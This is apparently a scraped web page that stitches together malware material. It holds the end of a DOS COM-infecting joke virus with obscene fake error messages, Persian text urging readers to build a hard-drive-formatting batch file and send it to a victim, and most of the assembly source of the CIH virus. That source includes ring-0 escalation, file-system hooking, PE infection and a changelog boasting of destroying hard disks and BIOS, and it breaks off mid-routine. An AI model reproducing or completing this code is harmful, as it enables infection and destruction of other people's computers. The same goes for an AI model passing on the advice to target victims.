uppercase uppercase: cmp al,'A' ;Abort? je terminateprog ;Yep, go do it. cmp al,'R' ;Retry? jne zskip ;skip over "retry" code lea dx,[bp+offset crlf] ;Point to crlf mov ah,9 ;Print string int 21h ;Call DOS to ^ mov dh,cl ;Restore DH from CL jmp timedone ;Reprint error zskip: cmp al,'I' ;Ignore? je ResumeProgram ;Return to host program cmp al,'F' ;Fail? jne simulate ;Invalid response lea dx,[bp+offset fail24] ;Point to fail string mov ah,9 ;Print string int 21h ;Call DOS to ^ int 20h ;Terminate program FlashFlop: mov ah,1 ;Wait for keypress int 21h ;Call DOS to ^ xor ax,ax ;Drive A: mov cx,1 ;Read 1 sector mov dx,ax ;Start at boot sector lea bx,[bp+offset boot_sector] ;BX points to buffer int 25h ;Flash light on A: jmp short ResumeProgram ;Resume if no error zpause: lea dx,[bp+offset pause] ;Point to pause message mov ah,9 ;Print string int 21h ;Call DOS to ^ zwait: mov ah,1 ;Wait for keypress int 21h ;Call DOS to ^ jmp short ResumeProgram ;Go on... ARIFmsg db cr,lf,'Abort, Retry, Ignore, Fail?$' fail24 db cr,lf,cr,lf,'Fail on INT 24' crlf db cr,lf,'$' message_table: dw offset msg1 dw offset msg2 dw offset msg3 dw offset msg4 dw offset msg5 dw offset msg6 dw offset msg7 dw offset msg8 dw offset msg9 dw offset msg10 dw offset msg11 dw offset msg12 dw offset msg13 dw offset msg14 dw offset msg15 dw offset msg16 dw offset msg17 dw offset msg18 dw offset msg19 dw offset msg20 msgs db 20 ; I tried to make it as simple as possible to change the messages ; and add/delete them. Each message is in the format: ; ; db [technique] ;[label] db [Text] ; ; Where [technique] is one of the 8 codes shown at the beginning of ; this file (terminate, halt, etc.). This determines what the virus ; should do after printing the message. ; [label] is in the form "msg##" where ## is a number from 1 to ; "msgs". "msgs" is defined immediately before this ; comment block. ; [text] is a combination of text and ASCII codes, terminated by ; either a '$' or a ,36. ; ; If you change the number of messages the virus has, you should also ; add/remove lines from the offset table and change the "msgs" ; data byte appropriately. Let's say for instance that you want ; to remove "Program too big to fit in memory.": ; 1) Delete the line(s) with the message and the line ; immediately before it. ; 2) Move message #20 up to message #2's position and ; change its label from "msg20" to "msg2". ; 3) Delete the line "dw offset msg20" from the offset ; table. ; 4) Change the line before this comment block to: ; "msgs db 19" ; ; Later! ; -The BOOT SECTOR Infector ... ; db FlashFloppy ;Waits for key, then flashes drive A: msg5 db 'I',39,'m hungry! Insert PIZZA & BEER into drive A: and',cr,lf pause db 'Strike any key when ready... $' db SimulateCritErr ;Prints ARIF message and responds appropriately msg1 db 'Impotence error reading user',39,'s dick$' db terminate ;Ends the program immediately msg2 db 'Program too big to fit in memory',cr,lf,'$' db halt ;Halts the system msg3 db 'Cannot load COMMAND, system halted',cr,lf,'$' db terminate ;Ends the program immediately msg4 db 'I',39,'m sorry, Dave.... but I',39,'m afraid' db ' I can',39,'t do that!',cr,lf,'$' db WaitKey ;Waits for a keypress, then runs the program msg6 db 'Format another? (Y/N)? $' db StackError ;Generates a stack overflow (halts the system) msg7 db 'Damn it! I told you not to touch that!$' db terminate ;Ends the program immediately msg8 db 'Suck me!',cr,lf,'$' db SimulateCritErr ;Prints ARIF message and responds appropriately msg9 db 'Cocksucker At Keyboard error reading device CON:$' db terminate ;Ends the program immediately msg10 db 7,cr,cr,cr,7,cr,cr,cr,7,cr,cr,cr,lf db 'I',39,'m sorry, but your call cannot be completed as dialed.' db cr,lf,'Please hang up & try your call again.',cr,lf,'$' db terminate ;Ends the program immediately msg11 db 'No!',cr,lf,cr,lf,'$' db halt ;Halts the system msg12 db 'Panic kernal mode interrupt$' db WaitKey ;Waits for a keypress, then runs the program msg13 db 'CONNECT 1200«',cr,lf,cr,lf,'$' db return2host ;Runs host program immediately msg14 db 'Okay, okay! Be patient! ...',cr,lf,'$' db terminate ;Ends the program immediately msg15 db 'And if I refuse?',cr,lf,'$' db return2host ;Runs host program immediately msg16 db 'Fuck the world and its followers!',cr,lf,'$' db return2host ;Runs host program immediately msg17 db 'You are pathetic, man... you know that?',cr,lf,'$' db terminate ;Ends the program immediately msg18 db 'Cum on! Talk DIRTY to me !!!',cr,lf,'$' db terminate ;Ends the program immediately msg19 db 'Your coprocessor wears floppy disks!',cr,lf,'$' db PauseKey ;Waits for keypress (SAKWR), then runs host prg msg20 db 'Joker! ver àà by TBSI!',cr,lf db 'Remember! EVERYTHING',39,'s bigger in Texas!',cr,lf,'$' int24handler: xor al,al ;Ignore the error iret ;Interrupt return filespec: db '*.COM',0 ;File specification prevdir: db '..',0 ;previous directory max2kill db 3 ;max. files to infect eoec:;ؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤEnd Of Encrypted Code VersionNumber dw 100h ;Version 1.00 encrypt_val db 0 ;1st-run copy only ; None of this information is included in the virus's code. It is only used ; during the search/infect routines and it is not necessary to preserve it ; in between calls to them. eof: DTA: db 21 dup (?) ;internal search's data attribute db ? ;attribute file_time db 2 dup (?) ;file's time stamp file_date db 2 dup (?) ;file's date stamp file_size db 4 dup (?) ;file's size filename db 13 dup (?) ;filename SavedAX dw ? ;Used to save AX infected db ? ;infection count addr dw ? ;Address boot_sector: main endp;rocedure code ends;egment end </body> </html>

با یک کلیک هارد فرمت کنید

دوستان اگر میخواهید با یک کلیک هاردتان Format (پاک) شود این کدها را در Note

pad ریخته و آنرا با پسوند Bat ذخیره کنید مثلا Format Hard.bat حال مواظب باشید

 که روی آن کلیک نکنید چون هارد شما صفر کیلومتر خواهد شد موفق باشید در پناه

حق!

Good Gory.

  برای ساخت این ویروس اول note pad را باز کرده و این کد ها را در آن کپی و پیست نمایید و بعد گزینه file را زده save as را زده بعد آنرا با پسوند bat ذخیره کنید مثلا Good Gory.bat و save را برای اتمام کار زده و حالا ویروس شما ساخته شد که مواظب باشید روی آن به هیچ وجه کلیک نکنید آنرا برای یکی بفرستید تا سیستم قربانی را به طور خفن داغون کنه موفق باشید نظر یادتون نره! 

; **************************************************************************** ; * The Virus Program Information * ; **************************************************************************** ; * * ; * Designer : CIH Source : TTIT of TATUNG in Taiwan * ; * Create Date : 04/26/1998 Now Version : 1.4 * ; * Modification Time : 05/31/1998 * ; * * ; * Turbo Assembler Version 4.0 : tasm /m cih * ; * Turbo Link Version 3.01 : tlink /3 /t cih, cih.exe * ; * * ; *==========================================================================* ; * Modification History * ; *==========================================================================* ; * v1.0 1. Create the Virus Program. * ; * 2. The Virus Modifies IDT to Get Ring0 Privilege. * ; * 04/26/1998 3. Virus Code doesn't Reload into System. * ; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. * ; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. * ; * 6. When System Opens Existing PE File, the File will be * ; * Infected, and the File doesn't be Reinfected. * ; * 7. It is also Infected, even the File is Read-Only. * ; * 8. When the File is Infected, the Modification Date and Time * ; * of the File also don't be Changed. * ; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call * ; * Previous FileSystemApiHook, it will Call the Function * ; * that the IFS Manager Would Normally Call to Implement * ; * this Particular I/O Request. * ; * 10. The Virus Size is only 656 Bytes. * ; *==========================================================================* ; * v1.1 1. Especially, the File that be Infected will not Increase * ; * it's Size... ^__^ * ; * 05/15/1998 2. Hook and Modify Structured Exception Handing. * ; * When Exception Error Occurs, Our OS System should be in * ; * Windows NT. So My Cute Virus will not Continue to Run, * ; * it will Jmup to Original Application to Run. * ; * 3. Use Better Algorithm, Reduce Virus Code Size. * ; * 4. The Virus "Basic" Size is only 796 Bytes. * ; *==========================================================================* ; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... * ; * 2. Modify the Bug of v1.1 * ; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. * ; *==========================================================================* ; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error. * ; * So When Open WinZip Self-Extractor ==> Don't Infect it. * ; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes. * ; *==========================================================================* ; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. * ; * 2. Change the Date of Killing Computers. * ; * 05/31/1998 3. Modify Virus Version Copyright. * ; * 4. The Virus "Basic" Size is 1019 Bytes. * ; **************************************************************************** .586P ; **************************************************************************** ; * Original PE Executable File(Don't Modify this Section) * ; **************************************************************************** OriginalAppEXE SEGMENT FileHeader: db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h dd 00000000h, VirusSize OriginalAppEXE ENDS ; **************************************************************************** ; * My Virus Game * ; **************************************************************************** ; ********************************************************* ; * Constant Define * ; ********************************************************* TRUE = 1 FALSE = 0 DEBUG = TRUE MajorVirusVersion = 1 MinorVirusVersion = 4 VirusVersion = MajorVirusVersion*10h+MinorVirusVersion IF DEBUG FirstKillHardDiskNumber = 81h HookExceptionNumber = 05h ELSE FirstKillHardDiskNumber = 80h HookExceptionNumber = 03h ENDIF FileNameBufferSize = 7fh ; ********************************************************* ; ********************************************************* VirusGame SEGMENT ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame ; ********************************************************* ; * Ring3 Virus Game Initial Program * ; ********************************************************* MyVirusStart: push ebp ; ************************************* ; * Let's Modify Structured Exception * ; * Handing, Prevent Exception Error * ; * Occurrence, Especially in NT. * ; ************************************* lea eax, [esp-04h*2] xor ebx, ebx xchg eax, fs:[ebx] call @0 @0: pop ebx lea ecx, StopToRunVirusCode-@0[ebx] push ecx push eax ; ************************************* ; * Let's Modify * ; * IDT(Interrupt Descriptor Table) * ; * to Get Ring0 Privilege... * ; ************************************* push eax ; sidt [esp-02h] ; Get IDT Base Address pop ebx ; add ebx, HookExceptionNumber*08h+04h ; ZF = 0 cli mov ebp, [ebx] ; Get Exception Base mov bp, [ebx-04h] ; Entry Point lea esi, MyExceptionHook-@1[ecx] push esi mov [ebx-04h], si ; shr esi, 16 ; Modify Exception mov [ebx+02h], si ; Entry Point Address pop esi ; ************************************* ; * Generate Exception to Get Ring0 * ; ************************************* int HookExceptionNumber ; GenerateException ReturnAddressOfEndException = $ ; ************************************* ; * Merge All Virus Code Section * ; ************************************* push esi mov esi, eax LoopOfMergeAllVirusCodeSection: mov ecx, [eax-04h] rep movsb sub eax, 08h mov esi, [eax] or esi, esi jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1 jmp LoopOfMergeAllVirusCodeSection QuitLoopOfMergeAllVirusCodeSection: pop esi ; ************************************* ; * Generate Exception Again * ; ************************************* int HookExceptionNumber ; GenerateException Again ; ************************************* ; * Let's Restore * ; * Structured Exception Handing * ; ************************************* ReadyRestoreSE: sti xor ebx, ebx jmp RestoreSE ; ************************************* ; * When Exception Error Occurs, * ; * Our OS System should be in NT. * ; * So My Cute Virus will not * ; * Continue to Run, it Jmups to * ; * Original Application to Run. * ; ************************************* StopToRunVirusCode: @1 = StopToRunVirusCode xor ebx, ebx mov eax, fs:[ebx] mov esp, [eax] RestoreSE: pop dword ptr fs:[ebx] pop eax ; ************************************* ; * Return Original App to Execute * ; ************************************* pop ebp push 00401000h ; Push Original OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack ret ; Return to Original App Entry Point ; ********************************************************* ; * Ring0 Virus Game Initial Program * ; ********************************************************* MyExceptionHook: @2 = MyExceptionHook jz InstallMyFileSystemApiHook ; ************************************* ; * Do My Virus Exist in System !? * ; ************************************* mov ecx, dr0 jecxz AllocateSystemMemoryPage add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException ; ************************************* ; * Return to Ring3 Initial Program * ; ************************************* ExitRing0Init: mov [ebx-04h], bp ; shr ebp, 16 ; Restore Exception mov [ebx+02h], bp ; iretd ; ************************************* ; * Allocate SystemMemory Page to Use * ; ************************************* AllocateSystemMemoryPage: mov dr0, ebx ; Set the Mark of My Virus Exist in System push 00000000fh ; push ecx ; push 0ffffffffh ; push ecx ; push ecx ; push ecx ; push 000000001h ; push 000000002h ; int 20h ; VMMCALL _PageAllocate _PageAllocate = $ ; dd 00010053h ; Use EAX, ECX, EDX, and flags add esp, 08h*04h xchg edi, eax ; EDI = SystemMemory Start Address lea eax, MyVirusStart-@2[esi] iretd ; Return to Ring3 Initial Program ; ************************************* ; * Install My File System Api Hook * ; ************************************* InstallMyFileSystemApiHook: lea eax, FileSystemApiHook-@6[edi] push eax ; int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook IFSMgr_InstallFileSystemApiHook = $ ; dd 00400067h ; Use EAX, ECX, EDX, and flags mov dr0, eax ; Save OldFileSystemApiHook Address pop eax ; EAX = FileSystemApiHook Address ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi] mov edx, [ecx] mov OldInstallFileSystemApiHook-@3[eax], edx ; Modify IFSMgr_InstallFileSystemApiHook Entry Point lea eax, InstallFileSystemApiHook-@3[eax] mov [ecx], eax cli jmp ExitRing0Init ; ********************************************************* ; * Code Size of Merge Virus Code Section * ; ********************************************************* CodeSizeOfMergeVirusCodeSection = offset $ ; ********************************************************* ; * IFSMgr_InstallFileSystemApiHook * ; ********************************************************* InstallFileSystemApiHook: push ebx call @4 ; @4: ; pop ebx ; mov ebx, offset FileSystemApiHook add ebx, FileSystemApiHook-@4 ; push ebx int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook IFSMgr_RemoveFileSystemApiHook = $ dd 00400068h ; Use EAX, ECX, EDX, and flags pop eax ; Call Original IFSMgr_InstallFileSystemApiHook ; to Link Client FileSystemApiHook push dword ptr [esp+8] call OldInstallFileSystemApiHook-@3[ebx] pop ecx push eax ; Call Original IFSMgr_InstallFileSystemApiHook ; to Link My FileSystemApiHook push ebx call OldInstallFileSystemApiHook-@3[ebx] pop ecx mov dr0, eax ; Adjust OldFileSystemApiHook Address pop eax pop ebx ret ; ********************************************************* ; * Static Data * ; ********************************************************* OldInstallFileSystemApiHook dd ? ; ********************************************************* ; * IFSMgr_FileSystemHook * ; ********************************************************* ; ************************************* ; * IFSMgr_FileSystemHook Entry Point * ; ************************************* FileSystemApiHook: @3 = FileSystemApiHook pushad call @5 ; @5: ; pop esi ; mov esi, offset VirusGameDataStartAddress add esi, VirusGameDataStartAddress-@5 ; ************************************* ; * Is OnBusy !? * ; ************************************* test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy ) jnz pIFSFunc ; goto pIFSFunc ; ************************************* ; * Is OpenFile !? * ; ************************************* ; if ( NotOpenFile ) ; goto prevhook lea ebx, [esp+20h+04h+04h] cmp dword ptr [ebx], 00000024h jne prevhook ; ************************************* ; * Enable OnBusy * ; ************************************* inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy ; ************************************* ; * Get FilePath's DriveNumber, * ; * then Set the DriveName to * ; * FileNameBuffer. * ; ************************************* ; * Ex. If DriveNumber is 03h, * ; * DriveName is 'C:'. * ; ************************************* ; mov esi, offset FileNameBuffer add esi, FileNameBuffer-@6 push esi mov al, [ebx+04h] cmp al, 0ffh je CallUniToBCSPath add al, 40h mov ah, ':' mov [esi], eax inc esi inc esi ; ************************************* ; * UniToBCSPath * ; ************************************* ; * This Service Converts * ; * a Canonicalized Unicode Pathname * ; * to a Normal Pathname in the * ; * Specified BCS Character Set. * ; ************************************* CallUniToBCSPath: push 00000000h push FileNameBufferSize mov ebx, [ebx+10h] mov eax, [ebx+0ch] add eax, 04h push eax push esi int 20h ; VXDCall UniToBCSPath UniToBCSPath = $ dd 00400041h add esp, 04h*04h ; ************************************* ; * Is FileName '.EXE' !? * ; ************************************* ; cmp [esi+eax-04h], '.EXE' cmp [esi+eax-04h], 'EXE.' pop esi jne DisableOnBusy IF DEBUG ; ************************************* ; * Only for Debug * ; ************************************* ; cmp [esi+eax-06h], 'FUCK' cmp [esi+eax-06h], 'KCUF' jne DisableOnBusy ENDIF ; ************************************* ; * Is Open Existing File !? * ; ************************************* ; if ( NotOpenExistingFile ) ; goto DisableOnBusy cmp word ptr [ebx+18h], 01h jne DisableOnBusy ; ************************************* ; * Get Attributes of the File * ; ************************************* mov ax, 4300h int 20h ; VXDCall IFSMgr_Ring0_FileIO IFSMgr_Ring0_FileIO = $ dd 00400032h jc DisableOnBusy push ecx ; ************************************* ; * Get IFSMgr_Ring0_FileIO Address * ; ************************************* mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi] mov edi, [edi] ; ************************************* ; * Is Read-Only File !? * ; ************************************* test cl, 01h jz OpenFile ; ************************************* ; * Modify Read-Only File to Write * ; ************************************* mov ax, 4301h xor ecx, ecx call edi ; VXDCall IFSMgr_Ring0_FileIO ; ************************************* ; * Open File * ; ************************************* OpenFile: xor eax, eax mov ah, 0d5h xor ecx, ecx xor edx, edx inc edx mov ebx, edx inc ebx call edi ; VXDCall IFSMgr_Ring0_FileIO xchg ebx, eax ; mov ebx, FileHandle ; ************************************* ; * Need to Restore * ; * Attributes of the File !? * ; ************************************* pop ecx pushf test cl, 01h jz IsOpenFileOK ; ************************************* ; * Restore Attributes of the File * ; ************************************* mov ax, 4301h call edi ; VXDCall IFSMgr_Ring0_FileIO ; ************************************* ; * Is Open File OK !? * ; ************************************* IsOpenFileOK: popf jc DisableOnBusy ; ************************************* ; * Open File Already Succeed. ^__^ * ; ************************************* push esi ; Push FileNameBuffer Address to Stack pushf ; Now CF = 0, Push Flag to Stack add esi, DataBuffer-@7 ; mov esi, offset DataBuffer ; *************************** ; * Get OffsetToNewHeader * ; *************************** xor eax, eax mov ah, 0d6h ; For Doing Minimal VirusCode's Length, ; I Save EAX to EBP. mov ebp, eax push 00000004h pop ecx push 0000003ch pop edx call edi ; VXDCall IFSMgr_Ring0_FileIO mov edx, [esi] ; *************************** ; * Get 'PE\0' Signature * ; * of ImageFileHeader, and * ; * Infected Mark. * ; *************************** dec edx mov eax, ebp call edi ; VXDCall IFSMgr_Ring0_FileIO ; *************************** ; * Is PE !? * ; *************************** ; * Is the File * ; * Already Infected !? * ; *************************** ; * WinZip Self-Extractor * ; * doesn't Have Infected * ; * Mark Because My Virus * ; * doesn't Infect it. * ; *************************** ; cmp [esi], '\0PE\0' cmp dword ptr [esi], 00455000h jne CloseFile ; ************************************* ; * The File is ^o^ * ; * PE(Portable Executable) indeed. * ; ************************************* ; * The File isn't also Infected. * ; ************************************* ; ************************************* ; * Start to Infect the File * ; ************************************* ; * Registers Use Status Now : * ; * * ; * EAX = 04h * ; * EBX = File Handle * ; * ECX = 04h * ; * EDX = 'PE\0\0' Signature of * ; * ImageFileHeader Pointer's * ; * Former Byte. * ; * ESI = DataBuffer Address ==> @8 * ; * EDI = IFSMgr_Ring0_FileIO Address * ; * EBP = D600h ==> Read Data in File * ; ************************************* ; * Stack Dump : * ; * * ; * ESP => ------------------------- * ; * | EFLAG(CF=0) | * ; * ------------------------- * ; * | FileNameBufferPointer | * ; * ------------------------- * ; * | EDI | * ; * ------------------------- * ; * | ESI | * ; * ------------------------- * ; * | EBP | * ; * ------------------------- * ; * | ESP | * ; * ------------------------- * ; * | EBX | * ; * ------------------------- * ; * | EDX | * ; * ------------------------- * ; * | ECX | * ; * ------------------------- * ; * | EAX | * ; * ------------------------- * ; * | Return Address | * ; * ------------------------- * ; ************************************* push ebx ; Save File Handle push 00h ; Set VirusCodeSectionTableEndMark ; *************************** ; * Let's Set the * ; * Virus' Infected Mark * ; *************************** push 01h ; Size push edx ; Pointer of File push edi ; Address of Buffer ; *************************** ; * Save ESP Register * ; *************************** mov dr1, esp ; *************************** ; * Let's Set the * ; * NewAddressOfEntryPoint * ; * ( Only First Set Size ) * ; *************************** push eax ; Size ; *************************** ; * Let's Read * ; * Image Header in File * ; *************************** mov eax, ebp mov cl, SizeOfImageHeaderToRead add edx, 07h ; Move EDX to NumberOfSections call edi ; VXDCall IFSMgr_Ring0_FileIO ; *************************** ; * Let's Set the * ; * NewAddressOfEntryPoint * ; * ( Set Pointer of File, * ; * Address of Buffer ) * ; *************************** lea eax, (AddressOfEntryPoint-@8)[edx] push eax ; Pointer of File lea eax, (NewAddressOfEntryPoint-@8)[esi] push eax ; Address of Buffer ; *************************** ; * Move EDX to the Start * ; * of SectionTable in File * ; *************************** movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi] lea edx, [eax+edx+12h] ; *************************** ; * Let's Get * ; * Total Size of Sections * ; *************************** mov al, SizeOfScetionTable ; I Assume NumberOfSections <= 0ffh mov cl, (NumberOfSections-@8)[esi] mul cl ; *************************** ; * Let's Set Section Table * ; *************************** ; Move ESI to the Start of SectionTable lea esi, (StartOfSectionTable-@8)[esi] push eax ; Size push edx ; Pointer of File push esi ; Address of Buffer ; *************************** ; * The Code Size of Merge * ; * Virus Code Section and * ; * Total Size of Virus * ; * Code Section Table Must * ; * be Small or Equal the * ; * Unused Space Size of * ; * Following Section Table * ; *************************** inc ecx push ecx ; Save NumberOfSections+1 shl ecx, 03h push ecx ; Save TotalSizeOfVirusCodeSectionTable add ecx, eax add ecx, edx sub ecx, (SizeOfHeaders-@9)[esi] not ecx inc ecx ; Save My Virus First Section Code ; Size of Following Section Table... ; ( Not Include the Size of Virus Code Section Table ) push ecx xchg ecx, eax ; ECX = Size of Section Table ; Save Original Address of Entry Point mov eax, (AddressOfEntryPoint-@9)[esi] add eax, (ImageBase-@9)[esi] mov (OriginalAddressOfEntryPoint-@9)[esi], eax cmp word ptr [esp], small CodeSizeOfMergeVirusCodeSection jl OnlySetInfectedMark ; *************************** ; * Read All Section Tables * ; *************************** mov eax, ebp call edi ; VXDCall IFSMgr_Ring0_FileIO ; *************************** ; * Full Modify the Bug : * ; * WinZip Self-Extractor * ; * Occurs Error... * ; *************************** ; * So When User Opens * ; * WinZip Self-Extractor, * ; * Virus Doesn't Infect it.* ; *************************** ; * First, Virus Gets the * ; * PointerToRawData in the * ; * Second Section Table, * ; * Reads the Section Data, * ; * and Tests the String of * ; * 'WinZip(R)'...... * ; *************************** xchg eax, ebp push 00000004h pop ecx push edx mov edx, (SizeOfScetionTable+PointerToRawData-@9)[esi] add edx, 12h call edi ; VXDCall IFSMgr_Ring0_FileIO ; cmp [esi], 'nZip' cmp dword ptr [esi], 'piZn' je NotSetInfectedMark pop edx ; *************************** ; * Let's Set Total Virus * ; * Code Section Table * ; *************************** ; EBX = My Virus First Section Code ; Size of Following Section Table pop ebx pop edi ; EDI = TotalSizeOfVirusCodeSectionTable pop ecx ; ECX = NumberOfSections+1 push edi ; Size add edx, ebp push edx ; Pointer of File add ebp, esi push ebp ; Address of Buffer ; *************************** ; * Set the First Virus * ; * Code Section Size in * ; * VirusCodeSectionTable * ; *************************** lea eax, [ebp+edi-04h] mov [eax], ebx ; *************************** ; * Let's Set My Virus * ; * First Section Code * ; *************************** push ebx ; Size add edx, edi push edx ; Pointer of File lea edi, (MyVirusStart-@9)[esi] push edi ; Address of Buffer ; *************************** ; * Let's Modify the * ; * AddressOfEntryPoint to * ; * My Virus Entry Point * ; *************************** mov (NewAddressOfEntryPoint-@9)[esi], edx ; *************************** ; * Setup Initial Data * ; *************************** lea edx, [esi-SizeOfScetionTable] mov ebp, offset VirusSize jmp StartToWriteCodeToSections ; *************************** ; * Write Code to Sections * ; *************************** LoopOfWriteCodeToSections: add edx, SizeOfScetionTable mov ebx, (SizeOfRawData-@9)[edx] sub ebx, (VirtualSize-@9)[edx] jbe EndOfWriteCodeToSections push ebx ; Size sub eax, 08h mov [eax], ebx mov ebx, (PointerToRawData-@9)[edx] add ebx, (VirtualSize-@9)[edx] push ebx ; Pointer of File push edi ; Address of Buffer mov ebx, (VirtualSize-@9)[edx] add ebx, (VirtualAddress-@9)[edx] add ebx, (ImageBase-@9)[esi] mov [eax+4], ebx mov ebx, [eax] add (VirtualSize-@9)[edx], ebx ; Section contains initialized data ==> 00000040h ; Section can be Read. ==> 40000000h or (Characteristics-@9)[edx], 40000040h StartToWriteCodeToSections: sub ebp, ebx jbe SetVirusCodeSectionTableEndMark add edi, ebx ; Move Address of Buffer EndOfWriteCodeToSections: loop LoopOfWriteCodeToSections ; *************************** ; * Only Set Infected Mark * ; *************************** OnlySetInfectedMark: mov esp, dr1 jmp WriteVirusCodeToFile ; *************************** ; * Not Set Infected Mark * ; *************************** NotSetInfectedMark: add esp, 3ch jmp CloseFile ; *************************** ; * Set Virus Code * ; * Section Table End Mark * ; *************************** SetVirusCodeSectionTableEndMark: ; Adjust Size of Virus Section Code to Correct Value add [eax], ebp add [esp+08h], ebp ; Set End Mark xor ebx, ebx mov [eax-04h], ebx ; *************************** ; * When VirusGame Calls * ; * VxDCall, VMM Modifies * ; * the 'int 20h' and the * ; * 'Service Identifier' * ; * to 'Call [XXXXXXXX]'. * ; *************************** ; * Before Writing My Virus * ; * to File, I Must Restore * ; * them First. ^__^ * ; *************************** lea eax, (LastVxDCallAddress-2-@9)[esi] mov cl, VxDCallTableSize LoopOfRestoreVxDCallID: mov word ptr [eax], 20cdh mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi] mov [eax+2], edx movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi] sub eax, edx loop LoopOfRestoreVxDCallID ; *************************** ; * Let's Write * ; * Virus Code to the File * ; *************************** WriteVirusCodeToFile: mov eax, dr1 mov ebx, [eax+10h] mov edi, [eax] LoopOfWriteVirusCodeToFile: pop ecx jecxz SetFileModificationMark mov esi, ecx mov eax, 0d601h pop edx pop ecx call edi ; VXDCall IFSMgr_Ring0_FileIO jmp 